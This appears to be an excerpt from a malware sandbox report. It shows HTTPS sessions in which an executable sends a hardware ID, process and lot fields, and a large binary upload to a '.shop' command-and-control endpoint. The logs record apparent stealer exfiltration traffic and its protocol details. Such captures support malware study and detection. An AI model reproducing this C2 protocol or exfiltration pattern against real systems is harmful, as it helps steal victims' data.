                2024-07-02 06:32:55 UTC | 12830 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:55 UTC | 806 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:55 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=k37g56cjqn12ktfg33vnbkc64g; expires=Sat, 26-Oct-2024 00:19:34 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EFjnGwKSCoJVafhpCjRDTGyRhwil6e5b6mF%2FsQRuQeHdF5z0rE0cP1K6Z4Zyt83VbKXn256AMsJoyxeHJ545zfESEwMmpq5UHqRYwewk84UVdm0q11hI%2Bnur29Cfzm83pkZJ587kwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99f02a334332-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:55 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.5 | 49710 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:32:56 UTC | 286 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 15072
                Host: contintnetksows.shop
                2024-07-02 06:32:56 UTC | 15072 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:56 UTC | 806 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:56 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=5182n68igjkkj9d5ht3hg9eklr; expires=Sat, 26-Oct-2024 00:19:35 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7E9VV656QlWMJxy3Nm1kBsNxlLKjrJrW33MJws0VmAQWKrwFo3uazIikPzkxcFl8ywy33k1dsVg1HHcbm0My7ytHMIAubgYFmoMSXHPNDFKLzhom91tc6mztujWS%2B%2Ft32aZwglFSOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99f88f270f4d-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:56 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.5 | 49711 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:32:57 UTC | 286 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 20562
                Host: contintnetksows.shop
                2024-07-02 06:32:57 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:57 UTC | 5231 | OUT | Data Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14
                Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
                2024-07-02 06:32:57 UTC | 810 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:57 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=pfge8itkvb6jmnagheh9ht3514; expires=Sat, 26-Oct-2024 00:19:36 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FAWMpSV6AUQGomw5hIpFiI41kxdVaJqzwStFFAofcE8Oa2QrdWoef6RrA3pp9OgNplD21xKELAZKedU5xb1VKd8Lj%2BwRM694OahG43eOr%2FqBFz3Ctp7UOyfdRimWvrEXsA6Kt%2BU1EA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99ff4a60428b-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:57 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.5 | 49712 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:32:59 UTC | 285 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 7081
                Host: contintnetksows.shop
                2024-07-02 06:32:59 UTC | 7081 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:32:59 UTC | 806 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:59 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=mfn8d3pe9dq1q3q0par5bgumhf; expires=Sat, 26-Oct-2024 00:19:38 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OLeuoUt8wf0dRHmtOisd3HuGwrasq6oZ4O7SFK%2FjZNOqnsbrAM7cACQl6JakqjhIgL%2F5AENnEimVkl2scwOLY04LLxmA8qw5v1aBWzAYcmxJVKhAWnNeGGS7md5qBYpPDPxYAKHosA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a097cff435e-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:59 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:32:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.5 | 49714 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:33:00 UTC | 285 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 1261
                Host: contintnetksows.shop
                2024-07-02 06:33:00 UTC | 1261 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:33:00 UTC | 812 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:33:00 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=teb1n5ri1t1sesk20po3ksmr2a; expires=Sat, 26-Oct-2024 00:19:39 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6hUTsGqnbUKWjlBGg3%2FU%2BwZdQhtyNdZy1zZd89AcrCtzyF0ozbMk3jn0xlR7PIzSbqHvN43whapuPngsOCGcwFJJCJcLXyr5T9BrIPGVG2urcEG6DZL%2BagK%2BfwPFzdIc3%2FL8hoeUGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a0fdb650c9d-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:33:00 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:33:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.5 | 49719 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:33:01 UTC | 287 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 586400
                Host: contintnetksows.shop
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 7c 70 e7 93 58 d4 db 70 4a 73 53 2d c1 ba 17 0a a9 0b 59 51 75 79 84 15 b2 79 a8 b8 e8 8d f1 4c 85 ae 41 8b 94 5c f5 53 83 31 d8 bd 59 70 4d ad d7 1e 72 4f 70 be 06 2d 11 34 ca f7 9e 05 c1 ed 83 6a 81 58 60 2a f9 85 31 94 7e 73 f3 4d d9 63 c5 52 76 e2 ed 66 12 48 f8 5d 6c 0d fc 7e 80 31 31 54 cb b8 ce f6 19 47 61 c0 89 cf d4 08 b9 4f d4 d3 20 38 0b 0f 8b a2 23 f4 13 21 36 60 4d f3 83 9c fb 28 2a 9a 8b da 7a 05 d5 25 f3 6d 8a 71 4b f9 80 35 c5 6d 15 c0 8a bf 8a 1c a7 51 b3 59 98 a7 bf cb 89 1e 80 83 b3 c3 71 34 1d 80 e4 60 ff bb 1d c6 1b a4 82 71 91 35 e9 7d 08 64 62 6c 3f 78 44 62 a9 ad 8f 28 eb 61 66 79 5f dd b0 82 e2 40 25 3a f2 0b c8 0a 58 ff 5e 7a 05 d0 07 84 15 f6 7b 00 5f d7 12 7e 1d 64 1e 93 3c 46 eb b4 71 79 3e 75 a9 9a 85 a7 be e3 07 22 65 d0 ad
                Data Ascii: |pXpJsS-YQuyyLA\S1YpMrOp-4jX`*1~sMcRvfH]l~11TGaO 8#!6`M(*z%mqK5mQYq4`q5}dbl?xDb(afy_@%:X^z{_~d<Fqy>u"e
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 53 e1 17 97 44 a2 6f 95 d9 ec 92 d8 21 44 5a a8 aa 6b 1b 0c 26 4e 79 79 d9 8d 64 79 4f a9 de de ec 33 15 e6 e7 5f 75 2c a3 3e 05 02 c5 28 d2 9f 6e cc 91 be 79 24 3e 5b 50 83 6b 4e a4 e1 3f 9c 26 99 d6 0f 28 a5 de 0d df 37 d9 a8 c7 52 b8 e4 c8 e8 16 ef 15 05 79 47 af a0 9a b2 32 bb 18 b5 73 5a 6f 97 57 6f 0f 86 e8 6c 77 0f fa 77 9c 9c 6b 92 bd ee 5f c7 fd 72 7d 70 90 3d 30 e3 c2 1a 4d 82 c8 59 c3 b1 f7 9d c6 5b 75 97 55 82 5a 34 9a cb 7f 6c 49 1a 9e 09 7e 1f fd e2 ad 2d 35 e8 32 0e 14 70 cc b6 74 89 80 bc 96 a6 37 e1 e3 cb bb bc 30 5f d1 d1 10 f0 7b e4 b0 68 80 75 9e 82 07 5b 25 60 a3 52 70 f3 13 60 7d 45 8c 98 dc 9f 89 47 c0 d3 9b bf f7 cf 2e 9c 2f b1 43 0a 85 00 d1 8a 77 a6 fc ff 77 99 92 7b 20 9a 72 0e d1 27 40 1c 75 cb ef 2f 1e 22 7a 08 52 09 10 35 36
                Data Ascii: SDo!DZk&NyydyO3_u,>(ny$>[PkN?&(7RyG2sZoWolwwk_r}p=0MY[uUZ4lI~-52pt70_{hu[%`Rp`}EG./Cww{ r'@u/"zR56
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: d9 13 01 f1 72 af bc 2a 6f b1 2f 78 16 8a 48 5f e4 01 5f e6 75 a8 ec b5 a5 4e 80 ff 57 13 6c 80 cf 19 55 1d 43 f7 c9 33 8e ba 0f 84 52 77 cf 42 c0 bd 60 2f c0 26 d4 c8 0d 9d 27 40 83 f9 4b 5c d4 83 a9 91 16 ca 80 e4 4e 37 7e cf bf ba cb a5 e5 28 70 6a 73 6a 99 ea f4 ed 4b c5 0f 9d 9d bb 57 3f 70 d2 df 8e f1 53 0f 3a 50 2e 79 68 d3 ac 0a 60 de bb 9f 86 10 15 7e c1 ac e7 84 9c af 2f 38 89 1c cd 07 ea 03 84 d4 a9 c1 8f 0b 9a 01 5d b7 16 c7 8f 70 7c af 6a 6e d5 8b dc 30 13 19 91 22 8e bc f8 13 30 e6 71 aa 62 28 80 4a 43 14 3d a9 09 9f 58 aa 19 7d b3 bb dc 5e 50 ac e0 3e 32 b1 f5 eb 92 ee d2 0d 81 3b 79 8c 80 37 0d f4 22 1d fd 0b df e0 c4 af 26 d4 df d7 b8 f0 f7 ad 5a c3 74 76 5b bb 59 8f 41 cb c4 5b 5f 45 2d ad 4f fc a5 33 69 f5 cf fe 59 0d 93 8f bc df b6 b5
                Data Ascii: r*o/xH__uNWlUC3RwB`/&'@K\N7~(pjsjKW?pS:P.yh`~/8]p|jn0"0qb(JC=X}^P>2;y7"&Ztv[YA[_E-O3iY
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 29 d7 4e 49 30 42 dd e9 9e 11 7b c1 0d 85 e0 31 77 25 55 de 94 5a 1a e2 cd f5 a7 67 3b 82 c9 76 5c 2f 19 5a 45 ca 46 98 25 2c a0 d3 60 bd 36 38 2d 49 50 dc 7e 29 a5 e3 34 16 8f 39 0c ce 0b 72 d5 0b f6 0e 1e 39 ea 59 0f 63 36 6e 92 d2 05 b4 fe 6f 91 fe ff 77 b9 ca 0b d6 26 61 09 28 90 36 2f 48 f2 07 37 91 5a 48 a0 7b 76 38 8d 88 a2 44 93 25 d1 5c 2c a9 4a e6 56 39 c8 82 7f c1 01 e4 b4 c2 3c ef 7b 41 70 93 d7 fb 6c 04 c6 19 9f 43 ad 6e 7c fe e8 41 c6 3f 2e d8 8c e4 a7 f5 ba f1 4c 28 75 86 57 1f 87 22 2b b9 bc 95 2b 03 c0 41 3b ec b5 22 2c 5b 2a 89 68 99 1a 02 9b 36 4a b2 54 a0 76 ef 6f 5a a2 1f 05 59 ad dc e3 12 3d ec 90 d9 fb fb f8 1f 62 6e 1d 19 40 b6 04 79 0b 82 7d cb 1d 95 e4 a3 3b 94 9d 44 cf 5a 51 00 5f 3f a3 1b 56 b6 c7 10 e2 a1 d6 b3 8b 0a d3 39 60
                Data Ascii: )NI0B{1w%UZg;v\/ZEF%,`68-IP~)49r9Yc6now&a(6/H7ZH{v8D%\,JV9<{AplCn|A?.L(uW"++A;",[*h6JTvoZY=bn@y};DZQ_?V9`
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 9c 9c 05 51 31 c6 8b dd 57 ce bd 62 7d aa a7 0f fd e4 34 b2 34 c7 a1 e1 01 14 59 61 f9 5c a3 4a eb 1b 85 24 ba f5 cb 93 26 d2 30 01 33 75 9c 4c 26 d7 1b 46 87 08 6c e8 aa b4 1d 11 0a fe c0 38 60 75 b0 98 23 09 0e 4a 1f 77 21 8e 01 d3 02 76 a4 4d 1b 30 32 ee e8 cf 61 56 b8 38 d7 ae 19 c4 b3 6f 5d a2 b8 1e 21 a6 4b 11 7a 72 0b d3 8b 3d e8 bf 76 e4 16 18 6b 08 23 f6 cd a3 c7 ff ec 66 b9 49 81 a5 f4 fd e4 ad f1 38 55 6b 97 be f8 af 2b de 10 dd 89 1f fd dd c6 26 71 ee 6b ac d3 f5 5d 38 87 f5 78 78 59 ec 8c 7d 1b 8e ee 32 be f1 db b2 30 81 17 43 a4 5e 12 8b 0b 6e d4 9d 90 44 dd 12 a1 e4 ae a8 8d ca 96 24 25 79 69 1e 1a 4f 2c ba af 8d 52 55 d8 2c dd a1 22 8d da f8 48 fb 22 37 41 cf 6c 66 8f 18 29 c0 fd 48 b3 3d 82 02 97 c7 54 b8 11 9b a2 84 85 36 14 cc 8c 85 18
                Data Ascii: Q1Wb}44Ya\J$&03uL&Fl8`u#Jw!vM02aV8o]!Kzr=vk#fI8Uk+&qk]8xxY}20C^nD$%yiO,RU,"H"7Alf)H=T6
                2024-07-02 06:33:01 UTC | 15331 | OUT | Data Raw: 45 32 c2 75 4f 1c 16 c6 04 a5 6c 26 eb a0 db b6 ee 76 3f d0 91 f0 da 8e 0d bb c0 ce 12 21 d9 ae 85 ab 3b 84 47 c1 28 9c 47 50 1c 3a c2 c2 f8 c1 f5 a5 1d e0 45 47 ab 89 51 78 c8 94 40 83 f6 48 bd 61 36 9c c8 b0 76 ae 4e 15 cb 15 a3 60 23 0c 73 88 a7 b2 e9 84 6f a6 78 1e 1e 0c 09 fc 0c a2 55 bd 59 de ef c9 47 75 3e 42 71 2e 53 49 0b 95 87 be 3c 45 91 61 93 99 c3 74 86 da 40 a8 25 2b 45 57 50 e5 7b b9 f8 b9 9e a3 42 54 5c 20 2e a5 51 9a 1a 1d 28 b0 e1 be 07 9f 16 56 c1 37 11 3b bf 90 6f aa fb 25 88 9f 55 14 1b 9c ae da ed 86 10 19 a9 14 1c 93 b5 1c 78 de 29 e3 4b e4 6a be e7 ee fb 10 f1 2b c9 66 03 7a c7 49 36 15 5c 28 61 b5 d6 aa 01 fc b8 0a 7d 60 ae bf 32 5b 58 d3 33 1e 29 af 14 73 de 10 fb d8 89 9e 52 b7 64 03 26 85 37 37 ff 45 91 db bf d0 ca bb 7a 76 fd
                Data Ascii: E2uOl&v?!;G(GP:EGQx@Ha6vN`#soxUYGu>Bq.SI<Eat@%+EWP{BT\ .Q(V7;o%Ux)Kj+fzI6\(a}`2[X3)sRd&77Ezv
